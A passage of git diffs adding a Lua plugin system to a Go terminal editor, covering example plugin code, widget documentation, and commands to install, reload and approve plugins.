+local selected = nil
+
+local function todo_items()
+  local items = {}
+  for _, t in ipairs(todos) do
+    table.insert(items, {
+      id = t.id,
+      label = t.label,
+      muted = t.done,
+      badge = t.done and "✓" or "",
+    })
+  end
+  return items
+end
+
+ttt.register({
+  sidebar = {
+    title = "TODOs",
+    render = function(panel)
+      panel:label({ text = #todos .. " tasks", style = "muted" })
+      panel:list({
+        items = todo_items(),
+        on_select = function(node)
+          selected = node.id
+          -- toggle done
+          for _, t in ipairs(todos) do
+            if t.id == node.id then
+              t.done = not t.done
+              break
+            end
+          end
+          panel:redraw()
+        end,
+      })
+      panel:button({
+        label = "&Add Task",
+        on_click = function()
+          local id = tostring(#todos + 1)
+          table.insert(todos, { id = id, label = "New task " .. id, done = false })
+          panel:redraw()
+        end,
+      })
+    end,
+  },
+  bottom = {
+    title = "Task Detail",
+    render = function(panel)
+      if selected == nil then
+        panel:label({ text = "Select a task in the sidebar", style = "muted" })
+        return
+      end
+      for _, t in ipairs(todos) do
+        if t.id == selected then
+          panel:label("Task: " .. t.label)
+          panel:label({ text = "Status: " .. (t.done and "Done" or "Pending"),
+                        style = t.done and "success" or "warning" })
+          return
+        end
+      end
+      panel:label({ text = "Task not found", style = "danger" })
+    end,
+  },
+})
+```

--- a/docs/PLUGINS.md
+++ b/docs/PLUGINS.md
@@ -21,7 +21,10 @@ ttt supports Lua plugins that can render panels in the sidebar and bottom panel 
   - [Button](#button)
   - [Input](#input)
   - [VStack](#vstack)
+  - [HStack](#hstack)
+  - [ScrollView](#scrollview)
   - [Box](#box)
+  - [Divider](#divider)
   - [Dropdown](#dropdown)
   - [Box Model](#box-model)
   - [Requesting Redraws](#requesting-redraws)
@@ -519,12 +522,13 @@ panel:input({
 
 **Input config fields:**
 
-| Field         | Type     | Default | Description                                    |
-|---------------|----------|---------|------------------------------------------------|
-| `placeholder` | string   | `""`    | Grayed-out hint text shown when input is empty.|
-| `prefix`      | string   | `""`    | Non-editable text displayed before the input.  |
-| `on_change`   | function | nil     | Called after every text change. Receives the current text (string). |
-| `on_submit`   | function | nil     | Called when Enter is pressed. Receives the current text (string). |
+| Field              | Type     | Default | Description                                    |
+|--------------------|----------|---------|------------------------------------------------|
+| `placeholder`      | string   | `""`    | Grayed-out hint text shown when input is empty.|
+| `prefix`           | string   | `""`    | Non-editable text displayed before the input.  |
+| `clear_on_submit`  | boolean  | `false` | When `true`, the input text is cleared after `on_submit` fires. |
+| `on_change`        | function | nil     | Called after every text change. Receives the current text (string). |
+| `on_submit`        | function | nil     | Called when Enter is pressed. Receives the current text (string). |
 
 The input text and cursor position are automatically preserved across re-renders.
 
@@ -552,6 +556,55 @@ panel:vstack({
 | `gap`    | number   | no       | Vertical gap (in rows) between children. Default: `0`.     |
 
 VStack is useful for grouping related widgets into sections. The child panel proxy supports all the same widget methods.
+
+---
+
+### HStack
+
+Horizontal stack layout container. Lays out child widgets side by side. The first child grows to fill available space; remaining children get fixed width.
+
+```lua
+panel:hstack({
+  gap = 1,
+  render = function(p)
+    p:label({ text = "Left (grows)", style = "default" })
+    p:button({ label = "&Action", on_click = function() end })
+  end,
+})
+```
+
+**HStack config fields:**
+
+| Field    | Type     | Required | Description                                                |
+|----------|----------|----------|------------------------------------------------------------|
+| `render` | function | yes      | Builder function that receives a child panel proxy. Call widget methods on it to add children. |
+| `gap`    | number   | no       | Horizontal gap (in columns) between children. Default: `0`. |
+
+The first child in the hstack expands to fill remaining horizontal space. All subsequent children are given their natural/fixed width. This is useful for toolbar-style layouts with a label or spacer on the left and action buttons on the right.
+
+---
+
+### ScrollView
+
+Scrollable container for content that may exceed the available height. Wraps children in a scroll view with mouse wheel scrolling and a scrollbar when content overflows.
+
+```lua
+panel:scrollview({
+  render = function(p)
+    for i = 1, 100 do
+      p:label("Line " .. i)
+    end
+  end,
+})
+```
+
+**ScrollView config fields:**
+
+| Field    | Type     | Required | Description                                                |
+|----------|----------|----------|------------------------------------------------------------|
+| `render` | function | yes      | Builder function that receives a child panel proxy. Call widget methods on it to add children. |
+
+Use `scrollview` when the content may exceed the panel height. The scroll position is preserved across re-renders. A scrollbar indicator appears on the right edge when content overflows.
 
 ---
 
@@ -600,6 +653,20 @@ panel:vstack({
   end,
 })
 ```
+
+---
+
+### Divider
+
+Horizontal divider line. Renders a single-line separator across the panel width. Useful for visually separating sections.
+
+```lua
+panel:label("Section 1")
+panel:divider()
+panel:label("Section 2")
+```
+
+No configuration fields. The divider takes no arguments and is not focusable.
 
 ---
 

--- a/go.mod
+++ b/go.mod
@@ -15,6 +15,7 @@ require (
 	github.com/gdamore/encoding v1.0.1 // indirect
 	github.com/lucasb-eyer/go-colorful v1.3.0 // indirect
 	github.com/rivo/uniseg v0.4.7 // indirect
+	github.com/yuin/gopher-lua v1.1.2 // indirect
 	golang.org/x/sys v0.38.0 // indirect
 	golang.org/x/term v0.37.0 // indirect
 	golang.org/x/text v0.31.0 // indirect

--- a/go.sum
+++ b/go.sum
@@ -25,6 +25,8 @@ github.com/lucasb-eyer/go-colorful v1.3.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i
 github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ=
 github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88=
 github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY=
+github.com/yuin/gopher-lua v1.1.2 h1:yF/FjE3hD65tBbt0VXLE13HWS9h34fdzJmrWRXwobGA=
+github.com/yuin/gopher-lua v1.1.2/go.mod h1:7aRmXIWl37SqRf0koeyylBEzJ+aPt8A+mmkQ4f1ntR8=
 golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
 golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc=
 golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4=

--- a/internal/app/app.go
+++ b/internal/app/app.go
@@ -81,6 +81,7 @@ type App struct {
 	PluginManager           *plugin.Manager
 	PendingPluginApprovals  []*plugin.Plugin
 	PluginsPanel            *PluginsPanel
+	Output                  *ui.OutputWidget
 }
 
 func (a *App) KeyFor(cmd string) string {

--- a/internal/app/app.go
+++ b/internal/app/app.go
@@ -12,6 +12,7 @@ import (
 	"github.com/eugenioenko/ttt/internal/command"
 	"github.com/eugenioenko/ttt/internal/config"
 	"github.com/eugenioenko/ttt/internal/lsp"
+	"github.com/eugenioenko/ttt/internal/plugin"
 	"github.com/eugenioenko/ttt/internal/render"
 	"github.com/eugenioenko/ttt/internal/term"
 	"github.com/eugenioenko/ttt/internal/terminal"
@@ -74,9 +75,11 @@ type App struct {
 	Running            *bool
 	quitPending        bool
 	Watcher            *watcher.Watcher
-	GitGutterGen       int
-	GitGutterTimer     *time.Timer
-	Version            string
+	GitGutterGen            int
+	GitGutterTimer          *time.Timer
+	Version                 string
+	PluginManager           *plugin.Manager
+	PendingPluginApprovals  []*plugin.Plugin
 }
 
 func (a *App) KeyFor(cmd string) string {

--- a/internal/app/app.go
+++ b/internal/app/app.go
@@ -365,9 +365,15 @@ func (a *App) Init(screen *term.TcellScreen, renderer *render.Renderer, lspManag
 	a.EditorGroup.OnFileOpen = func(path, lang, text string) {
 		a.NotifyLSPOpen(path, lang, text)
 		a.RequestGitGutterForActiveFile()
+		if a.PluginManager != nil {
+			a.PluginManager.DispatchEvent("file.open", path)
+		}
 	}
 	a.EditorGroup.OnFileClose = func(path, lang string) {
 		a.NotifyLSPClose(path, lang)
+		if a.PluginManager != nil {
+			a.PluginManager.DispatchEvent("file.close", path)
+		}
 	}
 	if path := a.EditorGroup.ActiveFilePath(); path != "" {
 		if a.EditorGroup.Editor != nil && a.EditorGroup.Editor.Highlighter != nil {
@@ -397,6 +403,9 @@ func (a *App) Init(screen *term.TcellScreen, renderer *render.Renderer, lspManag
 		a.ScheduleAutocomplete()
 		a.CheckSignatureHelpTrigger()
 		a.ScheduleGitGutter()
+		if a.PluginManager != nil {
+			a.PluginManager.DispatchEvent("editor.change", path)
+		}
 	}
 
 	lspManager.OnDiagnostics = func(params lsp.PublishDiagnosticsParams) {

--- a/internal/app/app.go
+++ b/internal/app/app.go
@@ -80,6 +80,7 @@ type App struct {
 	Version                 string
 	PluginManager           *plugin.Manager
 	PendingPluginApprovals  []*plugin.Plugin
+	PluginsPanel            *PluginsPanel
 }
 
 func (a *App) KeyFor(cmd string) string {

--- a/internal/app/callbacks.go
+++ b/internal/app/callbacks.go
@@ -52,6 +52,21 @@ func (a *App) ShowSidebarMoreMenu(sx, sy int) {
 			ui.MenuSep(),
 			{Label: "Help", Command: "changes.help"},
 		}
+	default:
+		if a.PluginManager != nil {
+			for _, p := range a.PluginManager.Plugins() {
+				if a.Sidebar.ActivePanel == "plugin."+p.Name && len(p.SidebarMenuEntries) > 0 {
+					for _, e := range p.SidebarMenuEntries {
+						items = append(items, ui.ContextMenuItem{
+							Label:   e.Label,
+							Command: e.Command,
+							IsSep:   e.Separator,
+						})
+					}
+					break
+				}
+			}
+		}
 	}
 	if len(items) > 0 {
 		openContextMenu(a, items, sx, sy)

--- a/internal/app/commands.go
+++ b/internal/app/commands.go
@@ -20,6 +20,7 @@ func RegisterCommands(app *App) {
 	registerHelpCommands(app)
 	registerOptionsCommands(app)
 	registerSettingsCommands(app)
+	registerPluginCommands(app)
 	registerWidgetCallbacks(app)
 	RegisterEscapeDismissers(app)
 }

--- a/internal/app/commands_editor.go
+++ b/internal/app/commands_editor.go
@@ -148,6 +148,9 @@ func (a *App) doSaveFile() {
 		a.NotifyLSPSave(path, lang, text)
 	}
 	a.RequestGitGutterForActiveFile()
+	if a.PluginManager != nil && path != "" {
+		a.PluginManager.DispatchEvent("file.save", path)
+	}
 }
 
 func (a *App) forceQuit() {

--- a/internal/app/commands_plugin.go
+++ b/internal/app/commands_plugin.go
@@ -5,6 +5,8 @@ import (
 	"github.com/eugenioenko/ttt/internal/plugin"
 	"github.com/eugenioenko/ttt/internal/ui"
 	"github.com/eugenioenko/ttt/internal/widgets"
+
+	"github.com/gdamore/tcell/v2"
 )
 
 func registerPluginCommands(app *App) {
@@ -76,6 +78,15 @@ func (a *App) ShowPluginApprovalDialog(p *plugin.Plugin) {
 						a.Sidebar.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
 						break
 					}
+				}
+				for _, reg := range a.PluginManager.BottomPanels {
+					if reg.ID == "plugin."+p.Name {
+						a.BottomPanel.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+						break
+					}
+				}
+				p.RequestRedraw = func() {
+					a.Screen.PostEvent(tcell.NewEventInterrupt(nil))
 				}
 			}
 			a.showNextPluginApproval()

--- a/internal/app/commands_plugin.go
+++ b/internal/app/commands_plugin.go
@@ -297,6 +297,9 @@ func (a *App) wirePlugin(p *plugin.Plugin) {
 	p.Network = NewPluginNetworkAPI()
 	a.wirePluginLog(p)
 	p.Borders = a.Borders
+	p.ShowInfoDialog = func(title string, entries []widgets.KeyValueEntry) {
+		a.ShowInfoDialog(title, entries)
+	}
 	p.ShowContextMenu = func(entries []widgets.MenuEntry, x, y int, onCommand func(string)) {
 		items := make([]ui.ContextMenuItem, len(entries))
 		for i, e := range entries {
@@ -317,6 +320,22 @@ func (a *App) wirePlugin(p *plugin.Plugin) {
 		}
 		a.Root.PushOverlay(ui.Overlay{Widget: menu, Modal: true})
 		a.Root.SetFocus(menu)
+	}
+
+	if p.SidebarMenuFunc != nil {
+		for _, entry := range p.SidebarMenuEntries {
+			if entry.Separator || entry.Command == "" {
+				continue
+			}
+			cmd := entry.Command
+			a.Reg.Register(command.Command{
+				ID:    cmd,
+				Title: entry.Label,
+				Handler: func() {
+					p.CallSidebarAction(cmd)
+				},
+			})
+		}
 	}
 
 	a.registerPluginCommandsAndKeys(p)

--- a/internal/app/commands_plugin.go
+++ b/internal/app/commands_plugin.go
@@ -11,6 +11,7 @@ import (
 	"github.com/eugenioenko/ttt/internal/widgets"
 
 	"github.com/gdamore/tcell/v2"
+	lua "github.com/yuin/gopher-lua"
 )
 
 func registerPluginCommands(app *App) {
@@ -329,6 +330,30 @@ func (a *App) wirePlugin(p *plugin.Plugin) {
 		}
 		a.Root.PushOverlay(ui.Overlay{Widget: menu, Modal: true})
 		a.Root.SetFocus(menu)
+	}
+
+	p.OpenDrawer = func(renderFunc *lua.LFunction, width, minWidth int) {
+		panelWidget := plugin.NewPluginPanelWidget(p, renderFunc, nil)
+		drawer := widgets.NewDrawerWidget(widgets.DrawerConfig{
+			Width:    width,
+			MinWidth: minWidth,
+			Borders:  *a.Borders,
+			OnDismiss: func() {
+				a.DismissDialog()
+			},
+		})
+		drawer.SetContent(panelWidget)
+		a.ShowDrawer(drawer)
+	}
+	p.CloseDrawer = func() {
+		a.DismissDialog()
+	}
+	p.OpenTab = func(id string, renderFunc, eventFunc *lua.LFunction) {
+		panelWidget := plugin.NewPluginPanelWidget(p, renderFunc, eventFunc)
+		a.EditorGroup.OpenPluginTab(id, panelWidget)
+	}
+	p.CloseTab = func(id string) {
+		a.EditorGroup.ClosePluginTab(id)
 	}
 
 	if p.SidebarMenuFunc != nil {

--- a/internal/app/commands_plugin.go
+++ b/internal/app/commands_plugin.go
@@ -271,13 +271,17 @@ func (a *App) ShowPluginApprovalDialog(p *plugin.Plugin) {
 func (a *App) wirePlugin(p *plugin.Plugin) {
 	for _, reg := range a.PluginManager.SidebarPanels {
 		if reg.ID == "plugin."+p.Name {
-			a.Sidebar.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+			if !a.Sidebar.HasPanel(reg.ID) {
+				a.Sidebar.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+			}
 			break
 		}
 	}
 	for _, reg := range a.PluginManager.BottomPanels {
 		if reg.ID == "plugin."+p.Name {
-			a.BottomPanel.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+			if !a.BottomPanel.HasPanel(reg.ID) {
+				a.BottomPanel.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+			}
 			break
 		}
 	}
@@ -292,6 +296,28 @@ func (a *App) wirePlugin(p *plugin.Plugin) {
 	p.System = NewPluginSystemAPI()
 	p.Network = NewPluginNetworkAPI()
 	a.wirePluginLog(p)
+	p.Borders = a.Borders
+	p.ShowContextMenu = func(entries []widgets.MenuEntry, x, y int, onCommand func(string)) {
+		items := make([]ui.ContextMenuItem, len(entries))
+		for i, e := range entries {
+			items[i] = ui.ContextMenuItem{
+				Label:   e.Label,
+				Command: e.Command,
+				IsSep:   e.Separator,
+			}
+		}
+		menu := ui.NewContextMenuWidget(items, x, y)
+		menu.Borders = a.Borders
+		menu.OnExec = func(cmd string) {
+			a.Root.PopOverlay()
+			onCommand(cmd)
+		}
+		menu.OnDismiss = func() {
+			a.Root.PopOverlay()
+		}
+		a.Root.PushOverlay(ui.Overlay{Widget: menu, Modal: true})
+		a.Root.SetFocus(menu)
+	}
 
 	a.registerPluginCommandsAndKeys(p)
 }
@@ -351,7 +377,7 @@ func (a *App) registerPluginCommandsAndKeys(p *plugin.Plugin) {
 
 func (a *App) RegisterStartupPluginCommands() {
 	for _, p := range a.PluginManager.Plugins() {
-		a.registerPluginCommandsAndKeys(p)
+		a.wirePlugin(p)
 	}
 }
 

--- a/internal/app/commands_plugin.go
+++ b/internal/app/commands_plugin.go
@@ -2,6 +2,7 @@ package app
 
 import (
 	"log/slog"
+	"time"
 
 	"github.com/eugenioenko/ttt/internal/command"
 	"github.com/eugenioenko/ttt/internal/config"
@@ -51,6 +52,27 @@ func registerPluginCommands(app *App) {
 			app.Sidebar.SetActivePanel("plugins")
 			app.SplitPanel.ShowLeft = true
 		},
+	})
+
+	reg.Register(command.Command{
+		ID:       "plugin.reload",
+		Title:    "Plugins: Reload",
+		Keywords: []string{"plugin", "reload", "refresh"},
+		Handler:  func() { app.pluginReload() },
+	})
+
+	reg.Register(command.Command{
+		ID:       "plugin.reloadAll",
+		Title:    "Plugins: Reload All",
+		Keywords: []string{"plugin", "reload", "refresh", "all"},
+		Handler:  func() { app.pluginReloadAll() },
+	})
+
+	reg.Register(command.Command{
+		ID:       "plugin.clearOutput",
+		Title:    "Plugins: Clear Output",
+		Keywords: []string{"plugin", "output", "clear", "log"},
+		Handler:  func() { app.Output.Clear() },
 	})
 }
 
@@ -269,8 +291,21 @@ func (a *App) wirePlugin(p *plugin.Plugin) {
 	p.Filesystem = NewPluginFilesystemAPI()
 	p.System = NewPluginSystemAPI()
 	p.Network = NewPluginNetworkAPI()
+	a.wirePluginLog(p)
 
 	a.registerPluginCommandsAndKeys(p)
+}
+
+func (a *App) wirePluginLog(p *plugin.Plugin) {
+	p.Log = func(level, message string) {
+		a.Output.AddLine(ui.OutputLine{
+			Time:       time.Now().Format("15:04:05"),
+			PluginName: p.Name,
+			Level:      level,
+			Message:    message,
+		})
+		a.Screen.PostEvent(tcell.NewEventInterrupt(nil))
+	}
 }
 
 func (a *App) registerPluginCommandsAndKeys(p *plugin.Plugin) {
@@ -317,6 +352,75 @@ func (a *App) registerPluginCommandsAndKeys(p *plugin.Plugin) {
 func (a *App) RegisterStartupPluginCommands() {
 	for _, p := range a.PluginManager.Plugins() {
 		a.registerPluginCommandsAndKeys(p)
+	}
+}
+
+func (a *App) pluginReload() {
+	plugins := a.PluginManager.Plugins()
+	if len(plugins) == 0 {
+		a.ShowConfirmDialogEx("Reload", "No plugins loaded.", []string{"Close"}, []func(){
+			func() { a.DismissDialog() },
+		})
+		return
+	}
+
+	if len(plugins) == 1 {
+		a.doPluginReload(plugins[0].Name)
+		return
+	}
+
+	var items []widgets.SelectItem
+	for _, p := range plugins {
+		items = append(items, widgets.SelectItem{ID: p.Name, Label: p.Name})
+	}
+	a.ShowSelectDialog("Reload Plugin", items, func(name string) {
+		a.doPluginReload(name)
+	}, nil)
+}
+
+func (a *App) doPluginReload(name string) {
+	a.Sidebar.RemovePanel("plugin." + name)
+	a.BottomPanel.RemovePanel("plugin." + name)
+
+	p, err := a.PluginManager.Reload(name)
+	if err != nil {
+		a.Output.AddLine(ui.OutputLine{
+			Time:       time.Now().Format("15:04:05"),
+			PluginName: name,
+			Level:      "error",
+			Message:    "reload failed: " + err.Error(),
+		})
+		if a.PluginsPanel != nil {
+			a.PluginsPanel.Refresh()
+		}
+		return
+	}
+
+	a.wirePlugin(p)
+
+	a.Output.AddLine(ui.OutputLine{
+		Time:       time.Now().Format("15:04:05"),
+		PluginName: name,
+		Level:      "info",
+		Message:    "reloaded successfully",
+	})
+	if a.PluginsPanel != nil {
+		a.PluginsPanel.Refresh()
+	}
+}
+
+func (a *App) pluginReloadAll() {
+	plugins := a.PluginManager.Plugins()
+	if len(plugins) == 0 {
+		return
+	}
+
+	var names []string
+	for _, p := range plugins {
+		names = append(names, p.Name)
+	}
+	for _, name := range names {
+		a.doPluginReload(name)
 	}
 }
 

--- a/internal/app/commands_plugin.go
+++ b/internal/app/commands_plugin.go
@@ -300,6 +300,15 @@ func (a *App) wirePlugin(p *plugin.Plugin) {
 	p.ShowInfoDialog = func(title string, entries []widgets.KeyValueEntry) {
 		a.ShowInfoDialog(title, entries)
 	}
+	p.ShowConfirmDialog = func(message string, onConfirm func()) {
+		a.ShowConfirmDialogEx("Confirm", message, []string{"Cancel", "OK"}, []func(){
+			func() { a.DismissDialog() },
+			func() {
+				a.DismissDialog()
+				onConfirm()
+			},
+		})
+	}
 	p.ShowContextMenu = func(entries []widgets.MenuEntry, x, y int, onCommand func(string)) {
 		items := make([]ui.ContextMenuItem, len(entries))
 		for i, e := range entries {

--- a/internal/app/commands_plugin.go
+++ b/internal/app/commands_plugin.go
@@ -1,7 +1,10 @@
 package app
 
 import (
+	"log/slog"
+
 	"github.com/eugenioenko/ttt/internal/command"
+	"github.com/eugenioenko/ttt/internal/config"
 	"github.com/eugenioenko/ttt/internal/plugin"
 	"github.com/eugenioenko/ttt/internal/ui"
 	"github.com/eugenioenko/ttt/internal/widgets"
@@ -17,6 +20,37 @@ func registerPluginCommands(app *App) {
 		Title:    "Plugins: List Installed",
 		Keywords: []string{"plugin", "extension"},
 		Handler:  func() { app.showPluginList() },
+	})
+
+	reg.Register(command.Command{
+		ID:       "plugin.install",
+		Title:    "Plugins: Install from URL",
+		Keywords: []string{"plugin", "extension", "install"},
+		Handler:  func() { app.pluginInstall() },
+	})
+
+	reg.Register(command.Command{
+		ID:       "plugin.uninstall",
+		Title:    "Plugins: Uninstall",
+		Keywords: []string{"plugin", "extension", "remove"},
+		Handler:  func() { app.pluginUninstall() },
+	})
+
+	reg.Register(command.Command{
+		ID:       "plugin.update",
+		Title:    "Plugins: Update",
+		Keywords: []string{"plugin", "extension", "upgrade"},
+		Handler:  func() { app.pluginUpdate() },
+	})
+
+	reg.Register(command.Command{
+		ID:       "plugin.showPanel",
+		Title:    "Plugins: Show Panel",
+		Keywords: []string{"plugin", "extension", "panel"},
+		Handler: func() {
+			app.Sidebar.SetActivePanel("plugins")
+			app.SplitPanel.ShowLeft = true
+		},
 	})
 }
 
@@ -47,6 +81,127 @@ func (a *App) showPluginList() {
 	a.ShowInfoDialog("Installed Plugins", entries)
 }
 
+func (a *App) pluginInstall() {
+	a.ShowInputDialogEx("Install Plugin", "Repository URL", "", "Install", func(repoURL string) {
+		go func() {
+			p, err := a.PluginManager.Install(repoURL)
+			a.Screen.PostEvent(tcell.NewEventInterrupt(&pluginInstallResult{
+				plugin: p,
+				err:    err,
+			}))
+		}()
+	})
+}
+
+type pluginInstallResult struct {
+	plugin *plugin.Plugin
+	err    error
+}
+
+func (a *App) handlePluginInstallResult(result *pluginInstallResult) {
+	if result.err != nil {
+		a.ShowConfirmDialogEx("Install Failed", result.err.Error(), []string{"Close"}, []func(){
+			func() { a.DismissDialog() },
+		})
+		return
+	}
+	a.PendingPluginApprovals = append(a.PendingPluginApprovals, result.plugin)
+	if len(a.PendingPluginApprovals) == 1 {
+		a.ShowPluginApprovalDialog(result.plugin)
+	}
+}
+
+func (a *App) pluginUninstall() {
+	names := a.PluginManager.InstalledPluginNames()
+	if len(names) == 0 {
+		a.ShowConfirmDialogEx("Uninstall", "No plugins installed.", []string{"Close"}, []func(){
+			func() { a.DismissDialog() },
+		})
+		return
+	}
+
+	var items []widgets.SelectItem
+	for _, name := range names {
+		items = append(items, widgets.SelectItem{ID: name, Label: name})
+	}
+
+	a.ShowSelectDialog("Uninstall Plugin", items, func(name string) {
+		a.ShowConfirmDialogEx("Confirm Uninstall", "Remove plugin \""+name+"\"?", []string{"Cancel", "Uninstall"}, []func(){
+			func() { a.DismissDialog() },
+			func() {
+				a.DismissDialog()
+				a.doPluginUninstall(name)
+			},
+		})
+	}, nil)
+}
+
+func (a *App) doPluginUninstall(name string) {
+	a.Sidebar.RemovePanel("plugin." + name)
+	a.BottomPanel.RemovePanel("plugin." + name)
+
+	if err := a.PluginManager.Uninstall(name); err != nil {
+		slog.Error("plugin uninstall", "error", err)
+	}
+
+	if a.PluginsPanel != nil {
+		a.PluginsPanel.Refresh()
+	}
+}
+
+func (a *App) pluginUpdate() {
+	names := a.PluginManager.InstalledPluginNames()
+	if len(names) == 0 {
+		a.ShowConfirmDialogEx("Update", "No plugins installed.", []string{"Close"}, []func(){
+			func() { a.DismissDialog() },
+		})
+		return
+	}
+
+	var items []widgets.SelectItem
+	for _, name := range names {
+		items = append(items, widgets.SelectItem{ID: name, Label: name})
+	}
+
+	a.ShowSelectDialog("Update Plugin", items, func(name string) {
+		go func() {
+			p, needsApproval, err := a.PluginManager.Update(name)
+			a.Screen.PostEvent(tcell.NewEventInterrupt(&pluginUpdateResult{
+				plugin:        p,
+				needsApproval: needsApproval,
+				err:           err,
+				name:          name,
+			}))
+		}()
+	}, nil)
+}
+
+type pluginUpdateResult struct {
+	plugin        *plugin.Plugin
+	needsApproval bool
+	err           error
+	name          string
+}
+
+func (a *App) handlePluginUpdateResult(result *pluginUpdateResult) {
+	if result.err != nil {
+		a.ShowConfirmDialogEx("Update Failed", result.err.Error(), []string{"Close"}, []func(){
+			func() { a.DismissDialog() },
+		})
+		return
+	}
+	if result.needsApproval && result.plugin != nil {
+		a.PendingPluginApprovals = append(a.PendingPluginApprovals, result.plugin)
+		if len(a.PendingPluginApprovals) == 1 {
+			a.ShowPluginApprovalDialog(result.plugin)
+		}
+		return
+	}
+	if a.PluginsPanel != nil {
+		a.PluginsPanel.Refresh()
+	}
+}
+
 func (a *App) ShowPluginApprovalDialog(p *plugin.Plugin) {
 	permEntries := p.Manifest.Permissions.DisplayEntries()
 
@@ -73,28 +228,10 @@ func (a *App) ShowPluginApprovalDialog(p *plugin.Plugin) {
 		{Label: "&Allow", Handler: func() {
 			a.DismissDialog()
 			if err := a.PluginManager.ApproveAndLoad(p); err == nil {
-				for _, reg := range a.PluginManager.SidebarPanels {
-					if reg.ID == "plugin."+p.Name {
-						a.Sidebar.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
-						break
-					}
-				}
-				for _, reg := range a.PluginManager.BottomPanels {
-					if reg.ID == "plugin."+p.Name {
-						a.BottomPanel.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
-						break
-					}
-				}
-				p.RequestRedraw = func() {
-					a.Screen.PostEvent(tcell.NewEventInterrupt(nil))
-				}
-				p.PostAsync = func(result *plugin.PluginAsyncResult) {
-					a.Screen.PostEvent(tcell.NewEventInterrupt(result))
-				}
-				p.Editor = NewPluginEditorAPI(a)
-				p.Filesystem = NewPluginFilesystemAPI()
-				p.System = NewPluginSystemAPI()
-				p.Network = NewPluginNetworkAPI()
+				a.wirePlugin(p)
+			}
+			if a.PluginsPanel != nil {
+				a.PluginsPanel.Refresh()
 			}
 			a.showNextPluginApproval()
 		}},
@@ -107,6 +244,122 @@ func (a *App) ShowPluginApprovalDialog(p *plugin.Plugin) {
 
 	adapter := ui.NewWidgetAdapter(dialog)
 	a.ShowDialog(adapter)
+}
+
+func (a *App) wirePlugin(p *plugin.Plugin) {
+	for _, reg := range a.PluginManager.SidebarPanels {
+		if reg.ID == "plugin."+p.Name {
+			a.Sidebar.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+			break
+		}
+	}
+	for _, reg := range a.PluginManager.BottomPanels {
+		if reg.ID == "plugin."+p.Name {
+			a.BottomPanel.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+			break
+		}
+	}
+	p.RequestRedraw = func() {
+		a.Screen.PostEvent(tcell.NewEventInterrupt(nil))
+	}
+	p.PostAsync = func(result *plugin.PluginAsyncResult) {
+		a.Screen.PostEvent(tcell.NewEventInterrupt(result))
+	}
+	p.Editor = NewPluginEditorAPI(a)
+	p.Filesystem = NewPluginFilesystemAPI()
+	p.System = NewPluginSystemAPI()
+	p.Network = NewPluginNetworkAPI()
+
+	a.registerPluginCommandsAndKeys(p)
+}
+
+func (a *App) registerPluginCommandsAndKeys(p *plugin.Plugin) {
+	for _, cmd := range p.Commands {
+		handler := cmd.Handler
+		plug := p
+		a.Reg.Register(command.Command{
+			ID:    cmd.ID,
+			Title: cmd.Title,
+			Handler: func() {
+				if err := plug.CallLuaFunc(handler); err != nil {
+					slog.Error("plugin command error", "plugin", plug.Name, "command", cmd.ID, "error", err)
+				}
+			},
+		})
+	}
+
+	for _, kb := range p.PluginKeybindings {
+		steps, err := config.ParseKeyString(kb.Key)
+		if err != nil {
+			slog.Warn("plugin keybinding parse error", "plugin", p.Name, "key", kb.Key, "error", err)
+			continue
+		}
+		cmdID := kb.Command
+		if len(steps) > 1 {
+			tcellSteps := make([]ui.GlobalKeyBinding, len(steps))
+			for i, step := range steps {
+				key, mod, rn := comboToTcell(step)
+				tcellSteps[i] = ui.GlobalKeyBinding{Key: key, Mod: mod, Rune: rn}
+			}
+			a.Root.AddChordKey(tcellSteps, func() {
+				a.Reg.Execute(cmdID)
+			})
+		} else {
+			key, mod, rn := comboToTcell(steps[0])
+			a.Root.AddGlobalKey(key, mod, rn, func() {
+				a.Reg.Execute(cmdID)
+			})
+		}
+		a.Reg.SetShortcut(cmdID, FormatKeyBinding(kb.Key))
+	}
+}
+
+func (a *App) RegisterStartupPluginCommands() {
+	for _, p := range a.PluginManager.Plugins() {
+		a.registerPluginCommandsAndKeys(p)
+	}
+}
+
+type RemoteRegistryResult struct {
+	Entries []plugin.RemoteRegistryEntry
+}
+
+func (a *App) PluginInstallFromURL(repoURL string) {
+	go func() {
+		p, err := a.PluginManager.Install(repoURL)
+		a.Screen.PostEvent(tcell.NewEventInterrupt(&pluginInstallResult{
+			plugin: p,
+			err:    err,
+		}))
+	}()
+}
+
+func (a *App) PluginUninstallByName(name string) {
+	a.ShowConfirmDialogEx("Confirm Uninstall", "Remove plugin \""+name+"\"?", []string{"Cancel", "Uninstall"}, []func(){
+		func() { a.DismissDialog() },
+		func() {
+			a.DismissDialog()
+			a.doPluginUninstall(name)
+		},
+	})
+}
+
+func (a *App) PluginUpdateByName(name string) {
+	go func() {
+		p, needsApproval, err := a.PluginManager.Update(name)
+		a.Screen.PostEvent(tcell.NewEventInterrupt(&pluginUpdateResult{
+			plugin:        p,
+			needsApproval: needsApproval,
+			err:           err,
+			name:          name,
+		}))
